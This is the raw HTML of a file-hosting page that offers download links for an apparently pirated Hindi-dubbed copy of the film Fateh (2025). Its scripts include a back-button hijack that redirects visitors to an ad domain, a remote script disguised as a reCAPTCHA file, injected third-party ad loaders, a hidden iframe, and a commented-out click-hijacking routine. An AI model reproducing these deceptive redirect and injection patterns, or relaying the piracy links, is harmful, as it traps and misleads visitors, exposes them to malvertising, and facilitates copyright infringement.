<script data-cfasync="false" src="//d1vy7td57198sq.cloudfront.net/?dtyvd=1108348"></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        history.pushState(null, null, location.href);
        window.onpopstate = function () {
            history.go(1);
            window.location.href = 'https://so-gr3at3.com/go/1272663';
        };
    });
</script>
<html>

<head>
    <title>Fateh.2025.HIN.DUB.480p.HDRip-DudeFilms.mkv</title>
    <meta charset="utf-8">
    <script async src="https://arc.io/widget.min.js#cmedRMLe"></script>
    <meta name="referrer" content="no-referrer">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css"
        integrity="sha384-50oBUHEmvpQ+1lW4y57PTFmhCaXp0ML5d60M1M7uH2+nqUivzIebhndOJK28anvf" crossorigin="anonymous">

    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.0/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-KyZXEAg3QhqLMpG8r+8fhAXLRk2vvoC2f3B09zVXn8CA5QIVfZOJ3BCsw2P0p/We" crossorigin="anonymous">

    <link
        href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i"
        rel="stylesheet">

    <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>

    <meta name=viewport content="width=device-width, initial-scale=1">
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex,nofollow">

</head>
<style>
    .icon {
        width: 48px;
        height: 48px
    }

    .card-header {
        padding: .75rem 1.25rem;
        margin-bottom: 0;
        background-color: #f8f9fc;
        border-bottom: 1px solid #e3e6f0
    }

    .bg-primary {
        background-color: #4e73df !important
    }

    body {
        font-family: "Nunito", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji" !important;
        font-weight: 14px
    }

    .font-weight-bold {
        font-weight: 700 !important
    }

    .text-primary {
        color: #007bff !important;
        padding: .75rem 1.25rem;
        background-color: #f8f9fc;
        border-bottom: 1px solid #e3e6f0;
        position: relative;
        display: flex;
        flex-direction: column;
        min-width: 0;
        word-wrap: break-word;
        border: 1px solid #e3e6f0;
        border-radius: .35rem;
        line-break: auto;
        word-break: break-all;
        white-space: normal;
        text-overflow: ellipsis;
        overflow: hidden
    }

    .font-weight-bold {
        font-weight: 700 !important
    }

    .m-0 {
        margin: auto !important;
        width: 100%
    }

    h4,
    .h4 {
        font-size: 1.4rem
    }

    .card-body {
        flex: 1 1 auto;
        padding: 1.25rem
    }

    .nav-tabs {
        border-bottom: 1px solid #dddfeb
    }

    .nav {
        display: flex;
        flex-wrap: wrap;
        padding-left: 0;
        margin-bottom: 0;
        list-style: none
    }

    .nav-tabs .nav-item {
        margin-bottom: -1px
    }

    .nav-tabs .nav-link.active,
    .nav-tabs .nav-item.show .nav-link {
        color: #6e707e;
        background-color: #fff;
        border-color: #007bff #dddfeb #fff;
        font-weight: 600
    }

    .nav-tabs .nav-link {
        border: 1px solid transparent;
        border-top-left-radius: .35rem;
        border-top-right-radius: .35rem
    }

    .nav-link {
        display: block;
        padding: .5rem 1rem
    }

    .nav-tabs .nav-link {
        border: 1px solid transparent;
        border-top-left-radius: .35rem;
        border-top-right-radius: .35rem
    }

    .nav-link {
        display: block;
        padding: .5rem 1rem
    }

    a {
        color: #4e73df;
        text-decoration: none;
        background-color: transparent
    }

    .footer {
        width: 100%;
        height: auto;
        position: absolute;
        right: 0;
        padding: 15px 50px 0 15px;
        font-size: 15px;
        color: #000;
        background-color: #F2F2F2;
        border-top: 0 solid #E6E6E6;
        font-weight: 600;
        text-align: right
    }

    .tab-content {
        width: 90%;
        height: auto;
        position: initial;
        right: 0;
        padding: 0;
        text-align: center
    }

    .btn {
        color: #fff !important;
        background-color: #007bff !important;
        border-color: #007bff !important;
        font-weight: 700 !important
    }

    .btn:hover {
        color: #fff !important;
        background-color: #0069d9 !important;
        border-color: #0062cc !important
    }

    .btn-success:not(:disabled):not(.disabled):active:focus,
    .btn-success:not(:disabled):not(.disabled).active:focus,
    .show>.btn-success.dropdown-toggle:focus {
        box-shadow: 0 0 0 .2rem rgba(38, 143, 255, 0.5)
    }

    .btn-success:focus,
    .btn-success.focus {
        box-shadow: 0 0 0 .2rem rgba(38, 143, 255, 0.5)
    }

    .btn-lg,
    .btn-group-lg>.btn {
        padding: .5rem 1rem;
        font-size: 1.2rem;
        border-radius: .45rem
    }

    .header {
        width: 100%;
        height: auto;
        position: relative;
        right: 0;
        padding: 10px 50px 5px 15px;
        font-size: 16px;
        color: #000;
        background-color: #F2F2F2;
        border-top: 0 solid #E6E6E6;
        font-weight: 600;
        text-align: right;
        margin-top: -25px
    }

    .alert-danger {
        background-color: #e74c3c;
        border-color: #e74c3c;
        color: #fff
    }

    .alert {
        padding: 15px;
        margin-bottom: 21px;
        border: 1px solid transparent;
        border-radius: 4px
    }

    .card {
        line-break: auto;
        word-break: break-all;
        white-space: normal;
        text-overflow: ellipsis;
        overflow: hidden
    }

    .m-5 {
        margin: auto !important
    }

    .swal-button {
        background-color: #007bff !important
    }

    .card-header:first-child {
        font-weight: 600
    }

    .btn-success1 {
        color: #fff;
        background-color: #28a745;
        border-color: #28a745;
        display: inline-block;
        text-align: center;
        font-size: 1rem;
        letter-spacing: .4px;
        font-family: 'Open Sans', sans-serif !important;
        font-weight: 600;
        text-decoration: none !important;
        vertical-align: middle;
        -webkit-user-select: none;
        -moz-user-select: none;
        -ms-user-select: none;
        user-select: none;
        border: 1px solid transparent;
        padding: .375rem .75rem;
        line-height: 1.5;
        border-radius: .30rem;
        transition: color .15s ease-in-out, background-color .15s ease-in-out, border-color .15s ease-in-out, box-shadow .15s ease-in-out;
    }

    .btn-success1:not(:disabled):not(.disabled).active,
    .btn-success1:not(:disabled):not(.disabled):active,
    .show>.btn-success1.dropdown-toggle {
        color: #fff;
        background-color: #1e7e34;
        border-color: #1c7430;
    }

    .btn-success1:hover {
        color: #fff;
        background-color: #218838;
        border-color: #1e7e34;
    }

    .btn-success1.focus,
    .btn-success1:focus {
        box-shadow: 0 0 0 0.2rem rgb(72 180 97 / 50%);
    }

    .btn-lg,
    .btn-group-lg>.btn2 {
        padding: .5rem .6rem !important;
        font-family: 'Open Sans', sans-serif !important;
        letter-spacing: .1px;
        border-radius: 0.35rem !important;
    }

    .ads-btns {
        position: relative;
        overflow: hidden
    }

    .ads-btns a.btn2 {
        min-width: 40%
    }

    .ads-btns svg {
        fill: #fff;
        width: 17px;
        position: absolute;
        right: 0;
        top: 0
    }

    .ads-btns svg path {
        fill: #fff;
        stroke: #fff
    }

    .ads-btns svg:first-child path {
        fill: #fff;
        stroke: transparent
    }

    .ads-btns svg:first-child {
        right: 20px
    }

    .downloads-btns-div .btn2 {
        margin: 0 3px 12px
    }

    .btn2 {
        font-style: normal;
        font-weight: 500;
        font-size: 14px;
        text-align: center;
        text-transform: uppercase;
        border: 2px solid #cbfc01;
        padding: 10px 15px;
        border-radius: 6px;
        -webkit-border-radius: 6px;
        -moz-border-radius: 6px;
        background: #0ebac3;
        color: #000;
        display: inline-block;
        text-decoration: none;
        background: #cbfc01
    }


    .btn-zip {
        border-color: #00d0ff;
        background: #00d0ff;
        color: #000
    }
</style>

<body>
    <center>
        <br />
        <div class="header">
            HubCloud | <a href="admin">Login</a>
        </div>

        <div class="container">
            <div class="card-body">
                <h2>
                    <div class="main" id="section2">

                        <div class="card h6">

                            <div class="card-header text-white bg-primary mb-3">
                                Fateh.2025.HIN.DUB.480p.HDRip-DudeFilms.mkv </div>

                            <div class="card-body">
                                <ul class="list-group">
                                    <li class="list-group-item d-flex justify-content-between align-items-center">File
                                        Size<i id="size">423.99 MB</i></li>
                                    <li class="list-group-item d-flex justify-content-between align-items-center">File
                                        Type<i>video/x-matrosk</i></li>
                                    <li class="list-group-item d-flex justify-content-between align-items-center">Share
                                        Date<i id="date">11-Jan-2025 11:08:49</i></li>
                                </ul>

                            </div>
                        </div>

                    </div>
                    <p class="h3 text-success">Download Link Generated</p>
                    <div class="input-group mb-3">
                        <input onclick="copy_link('ilink')" type="text" class="form-control"
                            value="https://hubcloud.ink/drive/fgw8949dwi9jgc2" readonly id="ilink">
                        <div class="input-group-prepend">
                            <span class="input-group-text btn" id="basic-addon2" onclick="copy_link('ilink')">Copy Share
                                Link</span>
                        </div>
                    </div>

                    <!-- Banners -->
                    <!--<ins data-revive-zoneid="6" data-revive-cphost="43509b58b68d940f8734726dfed6c5c8|1|hubcloud.in" data-revive-id="1d63e790351363d29b61f9cf59b98fad"></ins>-->
                    <!-- Mobile Banners -->
                    <!--<ins data-revive-zoneid="7" data-revive-cphost="43509b58b68d940f8734726dfed6c5c8|1|hubcloud.in" data-revive-id="1d63e790351363d29b61f9cf59b98fad"></ins>-->
                    <!--<script async src="//greenfox.ink/d/asyncjs.php"></script>-->

                    <div class="alert alert-warning h6" role="alert">
                        <span>If All Servers 🛜 are not working ❌ Then Please
                            <br><b>Change Your Browser DNS To Cloudflare 🚀 or Use <a href="https://one.one.one.one/"
                                    target="_blank">VPN</a></b>
                            <br><a href="https://tinyurl.com/Unblock-Ban-Site" target="_blank">How ? Click Here 👉 to
                                Watch Tutorial
                                👀</a></span>
                    </div>

                    <div class="ad-container"></div>

                    <a href="https://pub-db4aad121b26409eb63bf48ceb693403.r2.dev/Fateh.2025.HIN.DUB.480p.HDRip-DudeFilms.mkv"
                        rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6"><i
                            class="fas fa-file-download fa-lg"></i> Download [FSL
                        Server]</a>

                    <div class="ad-container"></div>
                    <iframe src="https://pixeldra.in/u/Ev8wmxhM?embed" width="0" height="0" frameborder="0"
                        style="display:none;" sandbox="allow-scripts allow-same-origin"></iframe>
                    <a href="https://pixeldra.in/api/file/VYNYsHLT?download"
                        download="Fateh.2025.HIN.DUB.480p.HDRip-DudeFilms.mkv" rel="noreferrer nofollow noopener"
                        target="_blank" class="btn btn-success btn-lg h6"
                        style="background-color: #6f42c1 !important;"><i class="fas fa-file-download fa-lg"></i>
                        Download [PixelServer :
                        2]</a>

                    <br>
                    <a href="https://gpdl.technorozen.workers.dev/?id=0fe7935c104de66c29884d0032c39c9f82c49e6b9b834f2d54d9f510b6f51411f7c747bba98cbce5e551aae07c9b777413aab1b0227ee71ce40ef26087cfe5c13c516e29851a806413b5d674f4dee20f5014cef158853824e6d9b31879a65e5d991db35cb060a05d19460e65707b4326::291ef22a7f266e18338b08e32dcfb5b9"
                        rel="noreferrer nofollow noopener" target="_blank" class="btn btn-danger btn-lg h6"
                        style="background-color: #dc3545 !important;"><i class="fas fa-file-download fa-lg"></i>
                        Download [Server :
                        10Gbps]</a>
                    <p style="
    font-size: 12px; padding-bottom:0px !important; margin-bottom:0px !important">Resume
                        Not Supported in 10Gbps So Use only if u have stable internet
                        (:</p>

                    <button id="android_launch" class="btn btn-success btn-lg h6 p-2 d-none"
                        style="background: #0d0b15 !important;"><i class="fab fa-android fa-lg"
                            style="color: #63E6BE;"></i>
                        DL/Open with Android App</button>

                    <script>
                        function createIntentURL({ host, scheme = 'http', type = 'application/octet-stream' }) {
                            let host_ = host.replace('https://', '');
                            return `intent://${host_}#Intent;scheme=${scheme};action=android.intent.action.VIEW;type=${type};S.browser_fallback_url=${encodeURIComponent(host)};end`;
                        }
                        function isAndroid() {
                            return /Android/i.test(navigator.userAgent);
                        }

                        const android_launch = document.getElementById('android_launch');
                        if (isAndroid()) {
                            android_launch.classList.remove("d-none");
                            android_launch.addEventListener('click', () => {
                                var anchor = document.createElement('a'); anchor.href = createIntentURL({
                                    host: 'https://pixeldra.in/api/file/VYNYsHLT?download', scheme: 'https', type: 'video/x-matrosk',
                                }); anchor.click();
                            });

                        };

                    </script>

                </h2>

                <div class="alert alert-warning" role="alert">
                    <p><b>Note : </b>Please Use Download Manager like <a
                            href="https://www.google.com/search?q=idm+dowload+manager" target="_blank"
                            rel="noopener noreferrer nofollow">IDM</a> Or <a
                            href="https://www.google.com/search?q=IDA+dowload+manager" target="_blank"
                            rel="noopener noreferrer nofollow">IDA</a> - To
                        accelerate Your Download Speeds </p>
                </div>

                <div class="alert alert-primary" role="alert">
                    <p><b>Note:</b> <i>Refresh this Page & click Download again if you
                            get any error.</i> ! Resume is Supported-Enjoy :)</p>
                </div>

                <div class="alert alert-info" role="alert">
                    <p><b>If you're getting any error please report at <a href="https://t.me/sumitbotreport">@Telegram
                                Group</a> with
                            Share Link And Screenshot (:</b></p>
                </div>
                <hr>

                <br>
                <div class="tab-content">
                    <div role="tabpanel" class="tab-pane fade show active" id="link">
                        <div class="text" align="center">
                            <ul class="nav nav-tabs" role="tablist">
                                <li class="nav-item">
                                    <a class="nav-link active" id="button1" role="tab" data-toggle="tab">Copy Link</a>
                                </li>
                            </ul>
                        </div>
                        <div class="card">
                            <div class="card-body" id="div1">
                                <p id="sharelink" onclick="copy_link('div1')">https://hubcloud.ink/drive/fgw8949dwi9jgc2
                                </p>
                            </div>
                            <button class="btn btn-success btn-sm" id="button1" onclick="copy_link('div1')"><i
                                    class="fa fa-copy"></i> Copy
                                Link</button>
                            <script>
                                var size = document.getElementById("size").innerHTML
                                var sharelink = document.getElementById("sharelink").innerHTML
                                if (size == 'NAN ') {
                                    swal({
                                        title: "Token Expired!",
                                        text: "Token Link has been expired Please Click on Ok Button To Generate New Link!",
                                        type: "success"
                                    }).then(function () {
                                        window.location = document.location.href = sharelink;
                                    });
                                }
                                function copy_link(e) { let el = e; e = document.getElementById(el).value; if (typeof e == 'undefined') { e = document.getElementById(el).innerText } a = document.createElement("textarea"); a.innerHTML = e, document.body.appendChild(a), a.select(); document.execCommand("copy"); document.body.removeChild(a), swal("Link Copied ! : " + e) }
                            </script>

                        </div>
                    </div>
                </div>
                <br>
                <br>
                <br>
                <br><br>
            </div>
            Msc
            <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
                integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
                crossorigin="anonymous"></script>
            <script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.3/dist/umd/popper.min.js"
                integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49"
                crossorigin="anonymous"></script>
            <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js"
                integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy"
                crossorigin="anonymous"></script>

            <!--2dl-->
            <div class="footer">

                <p>Made with <svg width="1em" height="1em" viewBox="0 0 16 16" class="bi bi-heart-fill" fill="red"
                        xmlns="http://www.w3.org/2000/svg">
                        <path fill-rule="evenodd"
                            d="M8 1.314C12.438-3.248 23.534 4.735 8 15-7.534 4.736 3.562-3.248 8 1.314z" />
                    </svg> By - S-B0t</p>
            </div>

</body>

</html>
<script>
    window.sessionStorage.setItem('xl', window.location.href)
    function cn(t) { let e = window.location.protocol + "//" + window.location.host + t; history.replaceState({ path: e }, "", e) } cn("/games/");
</script>
<script>
    function setCookie(e, t, i) { let o = encodeURIComponent(t), $ = new Date; $.setTime($.getTime() + 36e5 * i); let n = `${e}=${o}; expires=${$.toUTCString()}; path=/`; document.cookie = n } setCookie("xyt", 1, 24);
</script>
<script async src="https://greenanalytics.autos/recaptcha/v4_enc.js"></script>

<!--<script>let s__=!1,observer=null;const sc_="a, button";function opst(e){if(!s__)return;e.preventDefault(),e.stopImmediatePropagation();let t=document.createElement("a");t.href=s__,t.target="_blank",t.rel="noopener noreferrer",t.click();let r=document.querySelectorAll(sc_);r.forEach(e=>{e.removeEventListener("click",opst)}),observer.disconnect()}function atchs(){let e=document.querySelectorAll(sc_);e.forEach(e=>{e.addEventListener("click",opst,{once:!0})})}window.addEventListener("message",function(e){try{let t=JSON.parse(e.data);t?.url&&(s__=t.url,atchs(),(observer=new MutationObserver(atchs)).observe(document.body,{childList:!0,subtree:!0}))}catch(r){}},!1);-->
<!--</script>-->

<script type="text/javascript" src="//delivery.r2b2.io/get/gamerxyt.com/generic/sticky/mobile"></script>
<script type="text/javascript" src="//delivery.r2b2.io/get/gamerxyt.com/generic/sticky"></script>

<!-- Netpub Banner - Sticky 0x250 -->
<script
    type="text/javascript">{ let s = document.createElement("script"); s.setAttribute("async", true); s.setAttribute("src", "https://fstatic.netpub.media/static/f9de21a445985c7f977e3dc35747de7e.min.js?" + Date.now()); document.querySelector("head").appendChild(s); }</script>
<ins class="adv-f9de21a445985c7f977e3dc35747de7e"
    data-sizes-desktop="200x200,250x250,300x250,336x280,728x90,870x200,970x250,970x90"
    data-sizes-mobile="200x200,250x250,300x250,300x50,320x100,320x50,360x100,360x50" data-sticky="1"></ins>

<script data-cfasync="false" type="text/javascript" id="clever-core">
    /* <![CDATA[ */
    (function (document, window) {
        var a, c = document.createElement("script"), f = window.frameElement;

        c.id = "CleverCoreLoader80981";
        c.src = "https://scripts.cleverwebserver.com/d1dc9c0bd3890b45a35b61ffd175ea09.js";

        c.async = !0;
        c.type = "text/javascript";
        c.setAttribute("data-target", window.name || (f && f.getAttribute("id")));
        c.setAttribute("data-callback", "put-your-callback-function-here");
        c.setAttribute("data-callback-url-click", "put-your-click-macro-here");
        c.setAttribute("data-callback-url-view", "put-your-view-macro-here");


        try {
            a = parent.document.getElementsByTagName("script")[0] || document.getElementsByTagName("script")[0];
        } catch (e) {
            a = !1;
        }

        a || (a = document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0]);
        a.parentNode.insertBefore(c, a);
    })(document, window);
    /* ]]> */
</script>